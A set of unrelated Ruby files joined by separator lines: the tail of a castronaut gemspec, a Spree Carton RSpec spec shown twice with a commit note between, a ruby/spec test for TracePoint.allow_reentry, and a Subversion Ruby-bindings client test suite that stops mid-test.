"spec/castronaut/adapters/restful_authentication/adapter_spec.rb",
"spec/castronaut/adapters/restful_authentication/user_spec.rb",
"spec/castronaut/adapters_spec.rb",
"spec/castronaut/authentication_result_spec.rb",
"spec/castronaut/configuration_spec.rb",
"spec/castronaut/models/consumeable_spec.rb",
"spec/castronaut/models/dispenser_spec.rb",
"spec/castronaut/models/login_ticket_spec.rb",
"spec/castronaut/models/proxy_granting_ticket_spec.rb",
"spec/castronaut/models/proxy_ticket_spec.rb",
"spec/castronaut/models/service_ticket_spec.rb",
"spec/castronaut/models/ticket_granting_ticket_spec.rb",
"spec/castronaut/presenters/login_spec.rb",
"spec/castronaut/presenters/logout_spec.rb",
"spec/castronaut/presenters/process_login_spec.rb",
"spec/castronaut/presenters/proxy_validate_spec.rb",
"spec/castronaut/presenters/service_validate_spec.rb",
"spec/castronaut/ticket_result_spec.rb",
"spec/castronaut/utilities/random_string_spec.rb",
"spec/castronaut_spec.rb",
"spec/spec_controller_helper.rb",
"spec/spec_helper.rb",
"spec/spec_rails_mocks.rb"
]
if s.respond_to? :specification_version then
current_version = Gem::Specification::CURRENT_SPECIFICATION_VERSION
s.specification_version = 3
if Gem::Version.new(Gem::RubyGemsVersion) >= Gem::Version.new('1.2.0') then
else
end
else
end
end
|
require 'spec_helper'
describe Spree::Carton do
let(:carton) { create(:carton) }
describe "#create" do
subject { carton }
it "raises no errors" do
subject
end
end
describe "#tracking_url" do
subject do
carton.tracking_url
end
let(:carton) { create(:carton, shipping_method: shipping_method) }
let(:shipping_method) do
create(:shipping_method, tracking_url: "https://example.com/:tracking")
end
context "when tracking is not present" do
it { is_expected.to be_nil }
end
context "when tracking is present" do
let(:carton) do
create(:carton, shipping_method: shipping_method, tracking: "1Z12345")
end
it "uses shipping method to determine url" do
is_expected.to eq("https://example.com/1Z12345")
end
end
end
describe "#to_param" do
subject do
carton.to_param
end
it { is_expected.to eq carton.number }
end
describe "#order_numbers" do
subject { carton.order_numbers }
let(:order) { carton.orders.first }
it "returns a list of the order numbers it is associated to" do
expect(subject).to eq [order.number]
end
end
describe "#shipment_numbers" do
subject { carton.shipment_numbers }
let(:shipment) { carton.shipments.first }
it "returns a list of the order numbers it is associated to" do
expect(subject).to eq [shipment.number]
end
end
describe "#order_emails" do
subject { carton.order_emails }
let(:carton) { create(:carton, inventory_units: [first_order.inventory_units, second_order.inventory_units].flatten) }
let(:first_order) { create(:order_ready_to_ship, line_items_count: 1) }
let(:second_order) { create(:order_ready_to_ship, line_items_count: 1) }
let(:email) { 'something@something.com' }
before do
first_order.update_attributes!(email: email)
second_order.update_attributes!(email: email)
end
it "returns a unique list of the order emails it is associated to" do
expect(subject).to eq [email]
end
end
describe "#manifest" do
subject { carton.manifest }
let(:carton) { create(:carton, inventory_units: [first_order.inventory_units, second_order.inventory_units].flatten) }
let(:first_order) { create(:order_ready_to_ship, line_items_count: 1) }
let(:first_line_item) { first_order.line_items.first }
let(:second_order) { create(:order_ready_to_ship, line_items_count: 1) }
let(:second_line_item) { second_order.line_items.first }
it "contains only the items in both the carton and order" do
expect(subject.map(&:line_item)).to match_array([first_line_item, second_line_item])
end
end
describe "#manifest_for_order" do
subject { carton.manifest_for_order(first_order) }
let(:carton) { create(:carton, inventory_units: [first_order.inventory_units, second_order.inventory_units].flatten) }
let(:first_order) { create(:order_ready_to_ship, line_items_count: 1) }
let(:first_line_item) { first_order.line_items.first }
let(:second_order) { create(:order_ready_to_ship, line_items_count: 1) }
it "contains only the items in both the carton and order" do
expect(subject.map(&:line_item)).to eq [first_line_item]
end
end
describe "#any_exchanges?" do
subject { carton.any_exchanges? }
let(:carton) { create(:carton, inventory_units: [first_order.inventory_units, second_order.inventory_units].flatten) }
let(:first_order) { create(:order_ready_to_ship, line_items_count: 1) }
let(:second_order) { create(:order_ready_to_ship, line_items_count: 1) }
context "when any of the inventory has an original return item" do
let(:return_item) { create(:return_item) }
before do
first_order.inventory_units.first.original_return_item = return_item
first_order.save
end
it "is true" do
expect(subject).to be_truthy
end
end
context "when none of the inventory has an original return item" do
it "is false" do
expect(subject).to be_falsey
end
end
end
end
this is testing the shipment numbers here not orders
require 'spec_helper'
describe Spree::Carton do
let(:carton) { create(:carton) }
describe "#create" do
subject { carton }
it "raises no errors" do
subject
end
end
describe "#tracking_url" do
subject do
carton.tracking_url
end
let(:carton) { create(:carton, shipping_method: shipping_method) }
let(:shipping_method) do
create(:shipping_method, tracking_url: "https://example.com/:tracking")
end
context "when tracking is not present" do
it { is_expected.to be_nil }
end
context "when tracking is present" do
let(:carton) do
create(:carton, shipping_method: shipping_method, tracking: "1Z12345")
end
it "uses shipping method to determine url" do
is_expected.to eq("https://example.com/1Z12345")
end
end
end
describe "#to_param" do
subject do
carton.to_param
end
it { is_expected.to eq carton.number }
end
describe "#order_numbers" do
subject { carton.order_numbers }
let(:order) { carton.orders.first }
it "returns a list of the order numbers it is associated to" do
expect(subject).to eq [order.number]
end
end
describe "#shipment_numbers" do
subject { carton.shipment_numbers }
let(:shipment) { carton.shipments.first }
it "returns a list of the shipment numbers it is associated to" do
expect(subject).to eq [shipment.number]
end
end
describe "#order_emails" do
subject { carton.order_emails }
let(:carton) { create(:carton, inventory_units: [first_order.inventory_units, second_order.inventory_units].flatten) }
let(:first_order) { create(:order_ready_to_ship, line_items_count: 1) }
let(:second_order) { create(:order_ready_to_ship, line_items_count: 1) }
let(:email) { 'something@something.com' }
before do
first_order.update_attributes!(email: email)
second_order.update_attributes!(email: email)
end
it "returns a unique list of the order emails it is associated to" do
expect(subject).to eq [email]
end
end
describe "#manifest" do
subject { carton.manifest }
let(:carton) { create(:carton, inventory_units: [first_order.inventory_units, second_order.inventory_units].flatten) }
let(:first_order) { create(:order_ready_to_ship, line_items_count: 1) }
let(:first_line_item) { first_order.line_items.first }
let(:second_order) { create(:order_ready_to_ship, line_items_count: 1) }
let(:second_line_item) { second_order.line_items.first }
it "contains only the items in both the carton and order" do
expect(subject.map(&:line_item)).to match_array([first_line_item, second_line_item])
end
end
describe "#manifest_for_order" do
subject { carton.manifest_for_order(first_order) }
let(:carton) { create(:carton, inventory_units: [first_order.inventory_units, second_order.inventory_units].flatten) }
let(:first_order) { create(:order_ready_to_ship, line_items_count: 1) }
let(:first_line_item) { first_order.line_items.first }
let(:second_order) { create(:order_ready_to_ship, line_items_count: 1) }
it "contains only the items in both the carton and order" do
expect(subject.map(&:line_item)).to eq [first_line_item]
end
end
describe "#any_exchanges?" do
subject { carton.any_exchanges? }
let(:carton) { create(:carton, inventory_units: [first_order.inventory_units, second_order.inventory_units].flatten) }
let(:first_order) { create(:order_ready_to_ship, line_items_count: 1) }
let(:second_order) { create(:order_ready_to_ship, line_items_count: 1) }
context "when any of the inventory has an original return item" do
let(:return_item) { create(:return_item) }
before do
first_order.inventory_units.first.original_return_item = return_item
first_order.save
end
it "is true" do
expect(subject).to be_truthy
end
end
context "when none of the inventory has an original return item" do
it "is false" do
expect(subject).to be_falsey
end
end
end
end
|
Add spec for TracePoint.allow_reentry - https://bugs.ruby-lang.org/issues/15912
require_relative '../../spec_helper'
require_relative 'fixtures/classes'
ruby_version_is "3.1" do
describe 'TracePoint.allow_reentry' do
it 'allows the reentrance in a given block' do
event_lines = []
l1 = l2 = l3 = l4 = nil
TracePoint.new(:line) do |tp|
next unless TracePointSpec.target_thread?
event_lines << tp.lineno
next if (__LINE__ + 2 .. __LINE__ + 4).cover?(tp.lineno)
TracePoint.allow_reentry do
a = 1; l3 = __LINE__
b = 2; l4 = __LINE__
end
end.enable do
c = 3; l1 = __LINE__
d = 4; l2 = __LINE__
end
event_lines.should == [l1, l3, l4, l2, l3, l4]
end
it 'raises RuntimeError' do
-> {
TracePoint.allow_reentry{}
}.should raise_error(RuntimeError)
end
end
end
|
require "my-assertions"
require "util"
require "svn/core"
require "svn/client"
class SvnClientTest < Test::Unit::TestCase
include SvnTestUtil
def setup
setup_basic(true)
end
def teardown
teardown_basic
end
def test_version
assert_equal(Svn::Core.subr_version, Svn::Client.version)
end
def test_add_not_recurse
log = "sample log"
dir = "dir"
dir_path = File.join(@wc_path, dir)
path = File.join(dir_path, dir)
uri = "#{@repos_uri}/#{dir}/#{dir}"
ctx = make_context(log)
FileUtils.mkdir(dir_path)
FileUtils.mkdir(path)
ctx.add(dir_path, false)
ctx.commit(@wc_path)
assert_raise(Svn::Error::FS_NOT_FOUND) do
ctx.cat(uri)
end
end
def test_add_recurse
log = "sample log"
file = "hello.txt"
src = "Hello"
dir = "dir"
dir_path = File.join(@wc_path, dir)
path = File.join(dir_path, file)
uri = "#{@repos_uri}/#{dir}/#{file}"
ctx = make_context(log)
FileUtils.mkdir(dir_path)
File.open(path, "w") {|f| f.print(src)}
ctx.add(dir_path)
ctx.commit(@wc_path)
assert_equal(src, ctx.cat(uri))
end
def test_add_force
log = "sample log"
file = "hello.txt"
src = "Hello"
dir = "dir"
dir_path = File.join(@wc_path, dir)
path = File.join(dir_path, file)
uri = "#{@repos_uri}/#{dir}/#{file}"
ctx = make_context(log)
FileUtils.mkdir(dir_path)
File.open(path, "w") {|f| f.print(src)}
ctx.add(dir_path, false)
ctx.commit(@wc_path)
assert_raise(Svn::Error::ENTRY_EXISTS) do
ctx.add(dir_path, true, false)
end
ctx.add(dir_path, true, true)
ctx.commit(@wc_path)
assert_equal(src, ctx.cat(uri))
end
def test_add_no_ignore
log = "sample log"
file = "hello.txt"
src = "Hello"
dir = "dir"
dir_path = File.join(@wc_path, dir)
path = File.join(dir_path, file)
uri = "#{@repos_uri}/#{dir}/#{file}"
ctx = make_context(log)
FileUtils.mkdir(dir_path)
ctx.add(dir_path, false)
ctx.propset(Svn::Core::PROP_IGNORE, file, dir_path)
ctx.commit(@wc_path)
File.open(path, "w") {|f| f.print(src)}
ctx.add(dir_path, true, true, false)
ctx.commit(@wc_path)
assert_raise(Svn::Error::FS_NOT_FOUND) do
ctx.cat(uri)
end
ctx.add(dir_path, true, true, true)
ctx.commit(@wc_path)
assert_equal(src, ctx.cat(uri))
end
def test_mkdir
log = "sample log"
dir = "dir"
deep_dir = ["d", "e", "e", "p"]
dir2 = "dir2"
dir_uri = "#{@repos_uri}/#{dir}"
deep_dir_uri = "#{@repos_uri}/#{deep_dir.join('/')}"
dir2_uri = "#{@repos_uri}/#{dir2}"
dir_path = File.join(@wc_path, dir)
deep_dir_path = File.join(@wc_path, *deep_dir)
dir2_path = File.join(@wc_path, dir2)
ctx = make_context(log)
assert(!File.exist?(dir_path))
ctx.mkdir(dir_path)
assert(File.exist?(dir_path))
assert_raises(Svn::Error::EntryExists) do
ctx.add(dir_path)
end
old_rev = ctx.commit(@wc_path).revision
new_rev = ctx.mkdir(dir2_uri).revision
assert_equal(old_rev + 1, new_rev)
assert_raises(Svn::Error::FsAlreadyExists) do
ctx.mkdir(dir2_uri)
end
assert(!File.exist?(dir2_path))
ctx.update(@wc_path)
assert(File.exist?(dir2_path))
assert_raises(Svn::Error::SvnError) do
ctx.mkdir(deep_dir_path)
end
end
def test_mkdir_multiple
log = "sample log"
dir = "dir"
dir2 = "dir2"
dirs = [dir, dir2]
dirs_path = dirs.collect{|d| File.join(@wc_path, d)}
dirs_uri = dirs.collect{|d| "#{@repos_uri}/#{d}"}
ctx = make_context(log)
infos = []
ctx.set_notify_func do |notify|
infos << [notify.path, notify]
end
dirs_path.each do |path|
assert(!File.exist?(path))
end
ctx.mkdir(dirs_path)
assert_equal(dirs_path.sort,
infos.collect{|path, notify| path}.sort)
assert_equal(dirs_path.collect{true},
infos.collect{|path, notify| notify.add?})
dirs_path.each do |path|
assert(File.exist?(path))
end
infos.clear
ctx.commit(@wc_path)
assert_equal(dirs_path.sort,
infos.collect{|path, notify| path}.sort)
assert_equal(dirs_path.collect{true},
infos.collect{|path, notify| notify.commit_added?})
end
def test_mkdir_multiple2
log = "sample log"
dir = "dir"
dir2 = "dir2"
dirs = [dir, dir2]
dirs_path = dirs.collect{|d| File.join(@wc_path, d)}
dirs_uri = dirs.collect{|d| "#{@repos_uri}/#{d}"}
ctx = make_context(log)
infos = []
ctx.set_notify_func do |notify|
infos << [notify.path, notify]
end
dirs_path.each do |path|
assert(!File.exist?(path))
end
ctx.mkdir(*dirs_path)
assert_equal(dirs_path.sort,
infos.collect{|path, notify| path}.sort)
assert_equal(dirs_path.collect{true},
infos.collect{|path, notify| notify.add?})
dirs_path.each do |path|
assert(File.exist?(path))
end
infos.clear
ctx.commit(@wc_path)
assert_equal(dirs_path.sort,
infos.collect{|path, notify| path}.sort)
assert_equal(dirs_path.collect{true},
infos.collect{|path, notify| notify.commit_added?})
end
def test_mkdir_p
log = "sample log"
dir = "parent"
child_dir = "parent/child"
dir_path = Pathname(@wc_path) + dir
child_dir_path = dir_path + "child"
full_paths = [dir_path, child_dir_path].collect {|path| path.expand_path}
ctx = make_context(log)
infos = []
ctx.set_notify_func do |notify|
infos << [notify.path, notify]
end
assert_equal([false, false], [dir_path.exist?, child_dir_path.exist?])
ctx.mkdir_p(child_dir_path.to_s)
assert_equal(full_paths.collect {|path| path.to_s}.sort,
infos.collect{|path, notify| path}.sort)
assert_equal([true, true],
infos.collect{|path, notify| notify.add?})
assert_equal([true, true], [dir_path.exist?, child_dir_path.exist?])
infos.clear
ctx.commit(@wc_path)
assert_equal(full_paths.collect {|path| path.to_s}.sort,
infos.collect{|path, notify| path}.sort)
assert_equal([true, true],
infos.collect{|path, notify| notify.commit_added?})
end
def test_delete
log = "sample log"
src = "sample source\n"
file = "file.txt"
dir = "dir"
path = File.join(@wc_path, file)
dir_path = File.join(@wc_path, dir)
ctx = make_context(log)
File.open(path, "w") {|f| f.print(src)}
ctx.add(path)
ctx.mkdir(dir_path)
ctx.commit(@wc_path)
ctx.delete([path, dir_path])
ctx.commit(@wc_path)
assert(!File.exist?(path))
assert(!File.exist?(dir_path))
File.open(path, "w") {|f| f.print(src)}
ctx.add(path)
ctx.commit(@wc_path)
File.open(path, "w") {|f| f.print(src * 2)}
assert_raises(Svn::Error::ClientModified) do
ctx.delete(path)
end
assert_nothing_raised do
ctx.delete(path, true)
ctx.commit(@wc_path)
end
assert(!File.exist?(path))
end
def test_delete_alias
log = "sample log"
src = "sample source\n"
file = "file.txt"
dir = "dir"
path = File.join(@wc_path, file)
dir_path = File.join(@wc_path, dir)
ctx = make_context(log)
File.open(path, "w") {|f| f.print(src)}
ctx.add(path)
ctx.mkdir(dir_path)
ctx.commit(@wc_path)
ctx.rm([path, dir_path])
ctx.commit(@wc_path)
assert(!File.exist?(path))
assert(!File.exist?(dir_path))
File.open(path, "w") {|f| f.print(src)}
ctx.add(path)
ctx.commit(@wc_path)
File.open(path, "w") {|f| f.print(src * 2)}
assert_raises(Svn::Error::ClientModified) do
ctx.rm(path)
end
assert_nothing_raised do
ctx.rm_f(path)
ctx.commit(@wc_path)
end
assert(!File.exist?(path))
File.open(path, "w") {|f| f.print(src)}
ctx.add(path)
ctx.mkdir(dir_path)
ctx.commit(@wc_path)
ctx.rm_f(path, dir_path)
ctx.commit(@wc_path)
assert(!File.exist?(path))
assert(!File.exist?(dir_path))
end
def test_import
src = "source\n"
log = "sample log"
deep_dir = File.join(%w(a b c d e))
file = "sample.txt"
deep_dir_path = File.join(@wc_path, deep_dir)
path = File.join(deep_dir_path, file)
tmp_deep_dir_path = File.join(@tmp_path, deep_dir)
tmp_path = File.join(tmp_deep_dir_path, file)
ctx = make_context(log)
FileUtils.mkdir_p(tmp_deep_dir_path)
File.open(tmp_path, "w") {|f| f.print(src)}
ctx.import(@tmp_path, @repos_uri)
ctx.up(@wc_path)
assert_equal(src, File.open(path){|f| f.read})
end
def test_import_custom_revprops
src = "source\n"
log = "sample log"
deep_dir = File.join(%w(a b c d e))
file = "sample.txt"
deep_dir_path = File.join(@wc_path, deep_dir)
path = File.join(deep_dir_path, file)
tmp_deep_dir_path = File.join(@tmp_path, deep_dir)
tmp_path = File.join(tmp_deep_dir_path, file)
ctx = make_context(log)
FileUtils.mkdir_p(tmp_deep_dir_path)
File.open(tmp_path, "w") {|f| f.print(src)}
new_rev = ctx.import(@tmp_path, @repos_uri, true, false,
{"custom-prop" => "some-value"}).revision
assert_equal(["some-value", new_rev],
ctx.revprop_get("custom-prop", @repos_uri, new_rev))
ctx.up(@wc_path)
assert_equal(src, File.open(path){|f| f.read})
end
def test_commit
log = "sample log"
dir1 = "dir1"
dir2 = "dir2"
dir1_path = File.join(@wc_path, dir1)
dir2_path = File.join(dir1_path, dir2)
ctx = make_context(log)
assert_equal(Svn::Core::INVALID_REVNUM,ctx.commit(@wc_path).revision)
ctx.mkdir(dir1_path)
assert_equal(0, youngest_rev)
assert_equal(1, ctx.commit(@wc_path).revision)
ctx.mkdir(dir2_path)
assert_equal(Svn::Core::INVALID_REVNUM,ctx.commit(@wc_path, false).revision)
assert_equal(2, ctx.ci(@wc_path).revision)
end
def test_status
log = "sample log"
file1 = "sample1.txt"
file2 = "sample2.txt"
dir = "dir"
dir_path = File.join(@wc_path, dir)
path1 = File.join(@wc_path, file1)
path2 = File.join(dir_path, file2)
ctx = make_context(log)
File.open(path1, "w") {}
ctx.add(path1)
rev1 = ctx.commit(@wc_path).revision
ctx.mkdir(dir_path)
File.open(path2, "w") {}
infos = []
rev = ctx.status(@wc_path) do |path, status|
infos << [path, status]
end
assert_equal(youngest_rev, rev)
assert_equal([dir_path, path2].sort,
infos.collect{|path, status| path}.sort)
dir_status = infos.assoc(dir_path).last
assert(dir_status.text_added?)
assert(dir_status.entry.dir?)
assert(dir_status.entry.add?)
path2_status = infos.assoc(path2).last
assert(!path2_status.text_added?)
assert_nil(path2_status.entry)
infos = []
rev = ctx.st(@wc_path, rev1, true, true) do |path, status|
infos << [path, status]
end
assert_equal(rev1, rev)
assert_equal([@wc_path, dir_path, path1, path2].sort,
infos.collect{|path, status| path}.sort)
wc_status = infos.assoc(@wc_path).last
assert(wc_status.text_normal?)
assert(wc_status.entry.dir?)
assert(wc_status.entry.normal?)
dir_status = infos.assoc(dir_path).last
assert(dir_status.text_added?)
assert(dir_status.entry.dir?)
assert(dir_status.entry.add?)
path1_status = infos.assoc(path1).last
assert(path1_status.text_normal?)
assert(path1_status.entry.file?)
assert(path1_status.entry.normal?)
path2_status = infos.assoc(path2).last
assert(!path2_status.text_added?)
assert_nil(path2_status.entry)
ctx.prop_set(Svn::Core::PROP_IGNORE, file2, dir_path)
infos = []
rev = ctx.status(@wc_path, nil, true, true, true, false) do |path, status|
infos << [path, status]
end
assert_equal(rev1, rev)
assert_equal([@wc_path, dir_path, path1].sort,
infos.collect{|path, status| path}.sort)
infos = []
rev = ctx.status(@wc_path, nil, true, true, true, true) do |path, status|
infos << [path, status]
end
assert_equal(rev1, rev)
assert_equal([@wc_path, dir_path, path1, path2].sort,
infos.collect{|path, status| path}.sort)
end
def test_status_with_depth
setup_greek_tree
log = "sample log"
ctx = make_context(log)
# make everything out-of-date
ctx.prop_set('propname', 'propvalue', @greek.path(:b), :infinity)
recurse_and_depth_choices.each do |rd|
ctx.status(@greek.path(:mu), nil, rd) do |path, status|
assert_equal @greek.uri(:mu), status.url
end
end
expected_statuses_by_depth = {
true => [:beta, :b, :lambda, :e, :f, :alpha],
false => [:b, :lambda, :e, :f],
'empty' => [:b],
'files' => [:b, :lambda],
'immediates' => [:b, :lambda, :e, :f],
'infinity' => [:beta, :b, :lambda, :e, :f, :alpha],
}
recurse_and_depth_choices.each do |rd|
urls = []
ctx.status(@greek.path(:b), nil, rd) do |path, status|
urls << status.url
end
assert_equal(expected_statuses_by_depth[rd].map{|s| @greek.uri(s)}.sort,
urls.sort,
"depth '#{rd}")
end
end
def test_checkout
log = "sample log"
file = "hello.txt"
dir = "dir"
dir_path = File.join(@wc_path, dir)
path = File.join(dir_path, file)
content = "Hello"
ctx = make_context(log)
ctx.mkdir(dir_path)
File.open(path, "w"){|f| f.print(content)}
ctx.add(path)
ctx.commit(@wc_path)
FileUtils.rm_rf(@wc_path)
ctx.checkout(@repos_uri, @wc_path)
assert(File.exist?(path))
FileUtils.rm_rf(@wc_path)
ctx.co(@repos_uri, @wc_path, nil, nil, false)
assert(!File.exist?(path))
end
def test_update
log = "sample log"
file = "hello.txt"
path = File.join(@wc_path, file)
content = "Hello"
File.open(path, "w"){|f| f.print(content)}
ctx = make_context(log)
assert_nothing_raised do
ctx.update(File.join(@wc_path, "non-exist"), youngest_rev)
end
ctx.add(path)
commit_info = ctx.commit(@wc_path)
FileUtils.rm(path)
assert(!File.exist?(path))
assert_equal(commit_info.revision,
ctx.update(path, commit_info.revision))
assert_equal(content, File.read(path))
FileUtils.rm(path)
assert(!File.exist?(path))
assert_equal([commit_info.revision],
ctx.update([path], commit_info.revision))
assert_equal(content, File.read(path))
assert_raise(Svn::Error::FS_NO_SUCH_REVISION) do
begin
ctx.update(path, commit_info.revision + 1)
ensure
ctx.cleanup(@wc_path)
end
end
assert_nothing_raised do
ctx.update(path + "non-exist", commit_info.revision)
end
end
def test_revert
log = "sample log"
file1 = "hello1.txt"
file2 = "hello2.txt"
file3 = "hello3.txt"
dir = "dir"
dir_path = File.join(@wc_path, dir)
path1 = File.join(@wc_path, file1)
path2 = File.join(@wc_path, file2)
path3 = File.join(dir_path, file3)
content = "Hello"
ctx = make_context(log)
File.open(path1, "w"){|f| f.print(content)}
File.open(path2, "w"){|f| f.print(content)}
ctx.add(path1)
ctx.add(path2)
ctx.mkdir(dir_path)
File.open(path3, "w"){|f| f.print(content)}
ctx.add(path3)
commit_info = ctx.commit(@wc_path)
File.open(path1, "w"){}
assert_equal("", File.open(path1){|f| f.read})
ctx.revert(path1)
assert_equal(content, File.open(path1){|f| f.read})
File.open(path1, "w"){}
File.open(path2, "w"){}
assert_equal("", File.open(path1){|f| f.read})
assert_equal("", File.open(path2){|f| f.read})
ctx.revert([path1, path2])
assert_equal(content, File.open(path1){|f| f.read})
assert_equal(content, File.open(path2){|f| f.read})
File.open(path1, "w"){}
File.open(path2, "w"){}
File.open(path3, "w"){}
assert_equal("", File.open(path1){|f| f.read})
assert_equal("", File.open(path2){|f| f.read})
assert_equal("", File.open(path3){|f| f.read})
ctx.revert(@wc_path)
assert_equal(content, File.open(path1){|f| f.read})
assert_equal(content, File.open(path2){|f| f.read})
assert_equal(content, File.open(path3){|f| f.read})
File.open(path1, "w"){}
File.open(path2, "w"){}
File.open(path3, "w"){}
assert_equal("", File.open(path1){|f| f.read})
assert_equal("", File.open(path2){|f| f.read})
assert_equal("", File.open(path3){|f| f.read})
ctx.revert(@wc_path, false)
assert_equal("", File.open(path1){|f| f.read})
assert_equal("", File.open(path2){|f| f.read})
assert_equal("", File.open(path3){|f| f.read})
File.open(path1, "w"){}
File.open(path2, "w"){}
File.open(path3, "w"){}
assert_equal("", File.open(path1){|f| f.read})
assert_equal("", File.open(path2){|f| f.read})
assert_equal("", File.open(path3){|f| f.read})
ctx.revert(dir_path)
assert_equal("", File.open(path1){|f| f.read})
assert_equal("", File.open(path2){|f| f.read})
assert_equal(content, File.open(path3){|f| f.read})
end
def test_log
log1 = "sample log1"
log2 = "sample log2"
log3 = "sample log3"
src1 = "source1\n"
src2 = "source2\n"
src3 = "source3\n"
file1 = "sample1.txt"
file2 = "sample2.txt"
file3 = "sample3.txt"
path1 = File.join(@wc_path, file1)
path2 = File.join(@wc_path, file2)
path3 = File.join(@wc_path, file3)
abs_path1 = File.join('', file1)
abs_path2 = File.join('', file2)
abs_path3 = File.join('', file3)
ctx = make_context(log1)
File.open(path1, "w") {|f| f.print(src1)}
ctx.add(path1)
rev1 = ctx.ci(@wc_path).revision
ctx = make_context(log2)
ctx.cp(path1, path2)
rev2 = ctx.ci(@wc_path).revision
ctx = make_context(log3)
ctx.cp(path1, path3)
File.open(path1, "w") {|f| f.print(src2)}
File.open(path3, "w") {|f| f.print(src3)}
rev3 = ctx.ci(@wc_path).revision
changed_paths_lists = {}
revs = {}
messages = {}
keys = [@wc_path, path1, path2, path3]
keys.each do |key|
revs[key] = []
changed_paths_lists[key] = []
messages[key] = []
args = [key, 1, "HEAD", 0, true, nil]
ctx.log(*args) do |changed_paths, rev, author, date, message|
revs[key] << rev
changed_paths_lists[key] << changed_paths
messages[key] << message
end
end
changed_paths_list = changed_paths_lists[@wc_path]
assert_equal([rev1, rev2, rev3], revs[@wc_path])
assert_equal([rev1, rev3], revs[path1])
assert_equal([rev1, rev2], revs[path2])
assert_equal([rev1, rev3], revs[path3])
assert_equal([log1, log2, log3], messages[@wc_path])
expected = [[abs_path1], [abs_path2], [abs_path1, abs_path3]]
actual = changed_paths_list.collect {|changed_paths| changed_paths.keys}
assert_nested_sorted_array(expected, actual)
assert_equal('A', changed_paths_list[0][abs_path1].action)
assert_false(changed_paths_list[0][abs_path1].copied?)
assert_equal('A', changed_paths_list[1][abs_path2].action)
assert_true(changed_paths_list[1][abs_path2].copied?)
assert_equal(abs_path1, changed_paths_list[1][abs_path2].copyfrom_path)
assert_equal(rev1, changed_paths_list[1][abs_path2].copyfrom_rev)
assert_equal('M', changed_paths_list[2][abs_path1].action)
assert_equal('A', changed_paths_list[2][abs_path3].action)
end
def test_log_message
log = "sample log"
file = "hello.txt"
path = File.join(@wc_path, file)
FileUtils.touch(path)
ctx = make_context(log)
ctx.add(path)
commit_info = ctx.commit(@wc_path)
rev = commit_info.revision
assert_equal(log, ctx.log_message(path, rev))
end
def test_blame
log = "sample log"
file = "hello.txt"
srcs = %w(first second third)
infos = []
path = File.join(@wc_path, file)
ctx = make_context(log)
File.open(path, "w") {|f| f.puts(srcs[0])}
ctx.add(path)
commit_info = ctx.commit(@wc_path)
infos << [0, commit_info.revision, @author, commit_info.date, srcs[0]]
File.open(path, "a") {|f| f.puts(srcs[1])}
commit_info = ctx.commit(@wc_path)
infos << [1, commit_info.revision, @author, commit_info.date, srcs[1]]
File.open(path, "a") {|f| f.puts(srcs[2])}
commit_info = ctx.commit(@wc_path)
infos << [2, commit_info.revision, @author, commit_info.date, srcs[2]]
result = []
ctx.blame(path) do |line_no, revision, author, date, line|
result << [line_no, revision, author, date, line]
end
assert_equal(infos, result)
ctx.prop_set(Svn::Core::PROP_MIME_TYPE, "image/DUMMY", path)
ctx.commit(@wc_path)
assert_raise(Svn::Error::CLIENT_IS_BINARY_FILE) do
ctx.ann(path) {}
end
end
def test_diff
log = "sample log"
before = "before\n"
after = "after\n"
file = "hello.txt"
path = File.join(@wc_path, file)
File.open(path, "w") {|f| f.print(before)}
ctx = make_context(log)
ctx.add(path)
commit_info = ctx.commit(@wc_path)
rev1 = commit_info.revision
File.open(path, "w") {|f| f.print(after)}
out_file = Tempfile.new("svn")
err_file = Tempfile.new("svn")
ctx.diff([], path, rev1, path, "WORKING", out_file.path, err_file.path)
out_file.open
assert_match(/-#{before}\+#{after}\z/, out_file.read)
commit_info = ctx.commit(@wc_path)
rev2 = commit_info.revision
out_file = Tempfile.new("svn")
ctx.diff([], path, rev1, path, rev2, out_file.path, err_file.path)
out_file.open
assert_match(/-#{before}\+#{after}\z/, out_file.read)
end
def test_diff_peg
log = "sample log"
before = "before\n"
after = "after\n"
file = "hello.txt"
path = File.join(@wc_path, file)
File.open(path, "w") {|f| f.print(before)}
ctx = make_context(log)
ctx.add(path)
commit_info = ctx.commit(@wc_path)
rev1 = commit_info.revision
File.open(path, "w") {|f| f.print(after)}
out_file = Tempfile.new("svn")
err_file = Tempfile.new("svn")
ctx.diff_peg([], path, rev1, "WORKING", out_file.path, err_file.path)
out_file.open
assert_match(/-#{before}\+#{after}\z/, out_file.read)
commit_info = ctx.commit(@wc_path)
rev2 = commit_info.revision
out_file = Tempfile.new("svn")
ctx.diff_peg([], path, rev1, rev2, out_file.path, err_file.path)
out_file.open
assert_match(/-#{before}\+#{after}\z/, out_file.read)
end
def test_diff_summarize
log = "sample log"
before = "before\n"
after = "after\n"
file = "hello.txt"
path = File.join(@wc_path, file)
File.open(path, "w") {|f| f.print(before)}
ctx = make_context(log)
ctx.add(path)
commit_info = ctx.commit(@wc_path)
rev1 = commit_info.revision
File.open(path, "w") {|f| f.print(after)}
commit_info = ctx.commit(@wc_path)
rev2 = commit_info.revision
diffs = []
ctx.diff_summarize(@wc_path, rev1, @wc_path, rev2) do |diff|
diffs << diff
end
assert_equal([file], diffs.collect {|d| d.path})
kinds = diffs.collect do |d|
[d.kind_normal?, d.kind_added?, d.kind_modified?, d.kind_deleted?]
end
assert_equal([[false, false, true, false]], kinds)
assert_equal([false], diffs.collect {|d| d.prop_changed?})
node_kinds = diffs.collect do |d|
[d.node_kind_none?, d.node_kind_file?,
d.node_kind_dir?, d.node_kind_unknown?]
end
assert_equal([[false, true, false, false]], node_kinds)
end
def test_diff_summarize_peg
log = "sample log"
before = "before\n"
after = "after\n"
before_file = "before.txt"
after_file = "after.txt"
moved_file = "moved.txt"
before_path = File.join(@wc_path, before_file)
after_path = File.join(@wc_path, after_file)
moved_path = File.join(@wc_path, moved_file)
File.open(before_path, "w") {|f| f.print(before)}
ctx = make_context(log)
ctx.add(before_path)
commit_info = ctx.commit(@wc_path)
rev1 = commit_info.revision
ctx.mv(before_path, after_path)
commit_info = ctx.commit(@wc_path)
rev2 = commit_info.revision
File.open(after_path, "w") {|f| f.print(after)}
commit_info = ctx.commit(@wc_path)
rev3 = commit_info.revision
File.open(after_path, "w") {|f| f.print(before)}
commit_info = ctx.commit(@wc_path)
rev4 = commit_info.revision
ctx.mv(after_path, moved_path)
commit_info = ctx.commit(@wc_path)
rev5 = commit_info.revision
diffs = []
ctx.diff_summarize_peg(@repos_uri, rev3, rev4, rev3) do |diff|
diffs << diff
end
assert_equal([after_file], diffs.collect {|d| d.path})
kinds = diffs.collect do |d|
